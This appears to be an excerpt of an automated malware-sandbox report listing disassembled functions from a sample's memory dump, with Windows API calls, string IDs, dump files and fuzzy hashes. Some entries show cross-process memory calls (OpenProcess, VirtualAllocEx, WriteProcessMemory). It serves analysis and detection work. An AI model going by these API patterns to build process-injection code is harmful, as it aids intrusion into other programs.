                                                                                                                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00E950FB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                                                                                        • String ID: REMOVE$THIS
                                                                                                                        • API String ID: 2528338962-776492005
                                                                                                                        • Opcode ID: 97ca69773dbd0ba14576881f76ca3b372724262d984fc07add52263adb33bd6a
                                                                                                                        • Instruction ID: cf8a5b318ced708426a3ad5fa8cbba17afb37b25d9a8499e17886ea4348cfbaf
                                                                                                                        • Opcode Fuzzy Hash: 97ca69773dbd0ba14576881f76ca3b372724262d984fc07add52263adb33bd6a
                                                                                                                        • Instruction Fuzzy Hash: 8441C076A00A099FCF15DF65C881AAEB7F5BF48314F049469E916BB392CB30DC45CB40
                                                                                                                        Function 00E8CF7F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E94D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E8C9FE,?,?,00000034,00000800,?,00000034), ref: 00E94D6B
                                                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00E8CFC9
                                                                                                                          • Part of subcall function 00E94D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00E8CA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00E94D36
                                                                                                                          • Part of subcall function 00E94C65: GetWindowThreadProcessId.USER32(?,?), ref: 00E94C90
                                                                                                                          • Part of subcall function 00E94C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00E8C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00E94CA0
                                                                                                                          • Part of subcall function 00E94C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00E8C9C2,00000034,?,?,00001004,00000000,00000000), ref: 00E94CB6
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E8D036
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00E8D083
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 4150878124-2766056989
                                                                                                                        • Opcode ID: cd0b61d13b6f16e4ec8258280776af9467e1a2a5fbb38b04db14d0cd6123827e
                                                                                                                        • Instruction ID: f8e6feb78edbbf00ea41542d229d677c15a53b1f6b297306522a69aa08b60f54
                                                                                                                        • Opcode Fuzzy Hash: cd0b61d13b6f16e4ec8258280776af9467e1a2a5fbb38b04db14d0cd6123827e
                                                                                                                        • Instruction Fuzzy Hash: A0413FB6900218AFDF11EF94CC85FDEB7B8EF45700F104095EA59B7181DA706E45CB61
                                                                                                                        Function 00EBA44D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00EEDBF0,00000000,?,?,?,?), ref: 00EBA4E6
                                                                                                                        • GetWindowLongW.USER32 ref: 00EBA503
                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EBA513
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long
                                                                                                                        • String ID: SysTreeView32
                                                                                                                        • API String ID: 847901565-1698111956
                                                                                                                        • Opcode ID: 7c52bf62d7e17d9536a7595f0d15582aee883b81de9aa85b8807248f8e7cc620
                                                                                                                        • Instruction ID: 19120eae8efee3f9ed6855b1f2320b7e42692981d11882686ea5b194eb193cfa
                                                                                                                        • Opcode Fuzzy Hash: 7c52bf62d7e17d9536a7595f0d15582aee883b81de9aa85b8807248f8e7cc620
                                                                                                                        • Instruction Fuzzy Hash: 9031BD31241205AFDF219E38DC45BEB7BA9FB49328F289725F975B21E0C730E9509B60
                                                                                                                        Function 00EA57D7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00EA57E7
                                                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00EA581D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CrackInternet_memset
                                                                                                                        • String ID: ?K$|
                                                                                                                        • API String ID: 1413715105-747655002
                                                                                                                        • Opcode ID: 0ac6dddad000932a97e547919628431bcbe65d093a87940f4198767bc0241840
                                                                                                                        • Instruction ID: ec97238e9b166ce5d8635433b06222359d8f8f88d66c4fa1c19f2d38fea8810c
                                                                                                                        • Opcode Fuzzy Hash: 0ac6dddad000932a97e547919628431bcbe65d093a87940f4198767bc0241840
                                                                                                                        • Instruction Fuzzy Hash: B9313B72900219EBDF15AFA0DC95EEEBFB8FF19300F105025F815B6162DB359A0ACB60
                                                                                                                        Function 00EB9EE3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00EB9F6B
                                                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00EB9F7F
                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EB9FA3
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Window
                                                                                                                        • String ID: SysMonthCal32
                                                                                                                        • API String ID: 2326795674-1439706946
                                                                                                                        • Opcode ID: 3268c0b09b6ca426b2a20ef3208fa9d8c9b88e01d2d3adb2e730151b3a5b646c
                                                                                                                        • Instruction ID: e7a00cdeecede728fa8cf67af43b3db6affeb378ff5541bde3e66b302274e440
                                                                                                                        • Opcode Fuzzy Hash: 3268c0b09b6ca426b2a20ef3208fa9d8c9b88e01d2d3adb2e730151b3a5b646c
                                                                                                                        • Instruction Fuzzy Hash: 1B21BC32240218BBDF119F94CC82FEB3BA9EF48728F115214FA59BB1D1D6B5E8509B90
                                                                                                                        Function 00EBA698 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00EBA74F
                                                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00EBA75D
                                                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EBA764
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                                                        • String ID: msctls_updown32
                                                                                                                        • API String ID: 4014797782-2298589950
                                                                                                                        • Opcode ID: e2673441c9d1236e5d02187f746117dc1df0b5da66eabf48550e77cae54ccf13
                                                                                                                        • Instruction ID: 66c91e247e4c1d0cc1487729be5fac57de11fead3a3a78076a56153f29e823e8
                                                                                                                        • Opcode Fuzzy Hash: e2673441c9d1236e5d02187f746117dc1df0b5da66eabf48550e77cae54ccf13
                                                                                                                        • Instruction Fuzzy Hash: 5A21A3B5604208AFDB10DF68DCC1EE737ECEB493A8B045059FA01A7251CB70EC11DAA1
                                                                                                                        Function 00EB97B2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00EB983D
                                                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00EB984D
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00EB9872
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$MoveWindow
                                                                                                                        • String ID: Listbox
                                                                                                                        • API String ID: 3315199576-2633736733
                                                                                                                        • Opcode ID: b4a682d230c8084c20a0274bd42310f940a52b00deaf12fea11f12818a81a347
                                                                                                                        • Instruction ID: 6d684a970697849eefa96df6b34fc6a781ab50c41c58e37990234572652a20c2
                                                                                                                        • Opcode Fuzzy Hash: b4a682d230c8084c20a0274bd42310f940a52b00deaf12fea11f12818a81a347
                                                                                                                        • Instruction Fuzzy Hash: 8821F531610118BFEF158F54DC85FEB3BAAEF89758F018125FA14AB1A1CA719C118BA0
                                                                                                                        Function 00EBA217 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00EBA27B
                                                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00EBA290
                                                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00EBA29D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: msctls_trackbar32
                                                                                                                        • API String ID: 3850602802-1010561917
                                                                                                                        • Opcode ID: e70ec480feeeb827236f2360994fbef2ae0304a3b470bb8db31bf663abff6a5e
                                                                                                                        • Instruction ID: e0c7664974179ec1530716e2624cbb3ff8a9faa0a9f92bb04087146469692b81
                                                                                                                        • Opcode Fuzzy Hash: e70ec480feeeb827236f2360994fbef2ae0304a3b470bb8db31bf663abff6a5e
                                                                                                                        • Instruction Fuzzy Hash: 2011E771240308BEEF245F65DC46FE73BA9EF88B58F115128FA55A60A0D272E851DB60
                                                                                                                        Function 00E72F5F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00E73028,?), ref: 00E72F79
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00E72F80
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: RoInitialize$combase.dll
                                                                                                                        • API String ID: 2574300362-340411864
                                                                                                                        • Opcode ID: cb0769328c4000b09a6b3ae5287d57daf9aa3410c0a5d4ff3204f26bca142162
                                                                                                                        • Instruction ID: 3453897f407d6d769a34c11797ef34235a1b72097e5e526fe3cc6f41543385d1
                                                                                                                        • Opcode Fuzzy Hash: cb0769328c4000b09a6b3ae5287d57daf9aa3410c0a5d4ff3204f26bca142162
                                                                                                                        • Instruction Fuzzy Hash: 59E01A7069830CAEDB105F72EC49B953668F701716F01A025F606F91A0DBF94094EF04
                                                                                                                        Function 00E73034 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00E72F4E), ref: 00E7304E
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00E73055
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: RoUninitialize$combase.dll
                                                                                                                        • API String ID: 2574300362-2819208100
                                                                                                                        • Opcode ID: 6910005b0e4a74d141b7f744fd94e8a12b49f2833b08f473354ff5a8ed2c50b3
                                                                                                                        • Instruction ID: 8d4428e4c0a30e17e5810f831f7759de08d20b69927dea0edcd75e84d4ce0a37
                                                                                                                        • Opcode Fuzzy Hash: 6910005b0e4a74d141b7f744fd94e8a12b49f2833b08f473354ff5a8ed2c50b3
                                                                                                                        • Instruction Fuzzy Hash: 03E0B6B0689308BFDB605F71ED0DB853A68F710706F119015F109F21B0CFF94554AB14
                                                                                                                        Function 00ECBA51 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LocalTime__swprintf
                                                                                                                        • String ID: %.3d$WIN_XPe
                                                                                                                        • API String ID: 2070861257-2409531811
                                                                                                                        • Opcode ID: 8cf73fcd06d2883bdbdc50a5ef5a1d8410c5025fedc627db8744ef8979ab0262
                                                                                                                        • Instruction ID: eeca0100b1f80fdcfc7e1143e8e0a3302eaa0fb20042c88dcf408b673fdf3ca2
                                                                                                                        • Opcode Fuzzy Hash: 8cf73fcd06d2883bdbdc50a5ef5a1d8410c5025fedc627db8744ef8979ab0262
                                                                                                                        • Instruction Fuzzy Hash: 4EE01271C0911CFAC714C6D09E07EFA73BCAB04340F10949BB956B1040D3379B55BB22
                                                                                                                        Function 00E6E6E3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00E6E6D9,?,00E6E55B,00EEDC28,?,?), ref: 00E6E6F1
                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00E6E703
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: IsWow64Process$kernel32.dll
                                                                                                                        • API String ID: 2574300362-3024904723
                                                                                                                        • Opcode ID: 378fdca960051c31f0a17d77cb950e1aa63dd57ecb68910c5ed404c6960f3c88
                                                                                                                        • Instruction ID: 698388afe88ba719d5471d566ecdc1112235d5456a1ed222fd316648d919ef20
                                                                                                                        • Opcode Fuzzy Hash: 378fdca960051c31f0a17d77cb950e1aa63dd57ecb68910c5ed404c6960f3c88
                                                                                                                        • Instruction Fuzzy Hash: E2D0A7784853138FD7202F21FC4C6133BD8FB04305B10541BE4A5F22D0D770D4809630
                                                                                                                        Function 00E6E6A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00E6E69C,76230AE0,00E6E5AC,00EEDC28,?,?), ref: 00E6E6B4
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E6E6C6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                        • API String ID: 2574300362-192647395
                                                                                                                        • Opcode ID: 4e8dad4df09ee60cd4080a74b56ef4d8d7d7eb807728138eb1308278f09f9ff0
                                                                                                                        • Instruction ID: eba55e81ab33b4fcc40c4696211e8bf0e50fd55acd3781dd5011d70755914d53
                                                                                                                        • Opcode Fuzzy Hash: 4e8dad4df09ee60cd4080a74b56ef4d8d7d7eb807728138eb1308278f09f9ff0
                                                                                                                        • Instruction Fuzzy Hash: 52D0A7384C53128FD7305F31FC0D60637D8EB24705B20641BE455F12E0D770C4809620
                                                                                                                        Function 00EAEBB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,00EAEBAF,?,00EAEAAC), ref: 00EAEBC7
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00EAEBD9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                        • API String ID: 2574300362-1816364905
                                                                                                                        • Opcode ID: 8e7f1d5e8f9d5d5119b7cf88f597c22ebdf7fddfc1ae8f88b6533d7c1dd52a18
                                                                                                                        • Instruction ID: 145253ec799a11d89bf19befb875f81c2803d3307633153052c02e2f41b51317
                                                                                                                        • Opcode Fuzzy Hash: 8e7f1d5e8f9d5d5119b7cf88f597c22ebdf7fddfc1ae8f88b6533d7c1dd52a18
                                                                                                                        • Instruction Fuzzy Hash: 05D0A7785493138FD7305F35FC4CA0237D8EB08308B20941BF866F1290DB70E8809620
                                                                                                                        Function 00E913A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00E91371,?,00E91519), ref: 00E913B4
                                                                                                                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00E913C6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
